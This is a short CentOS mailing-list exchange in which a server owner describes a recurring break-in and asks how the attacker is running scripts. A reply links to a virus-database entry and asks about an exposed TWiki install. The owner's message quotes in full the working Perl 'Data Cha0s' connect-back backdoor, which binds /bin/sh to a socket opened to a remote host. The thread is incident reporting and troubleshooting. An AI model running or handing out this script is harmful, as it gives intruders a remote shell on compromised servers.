A bit of simple Googling should point you in the right direction...
http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&...
Are you running Twiki open to the internet?
http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html
Will.
On 30/11/05, Ajay Sharma ssharma@revsharecorp.com wrote:
I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
#!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n";
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos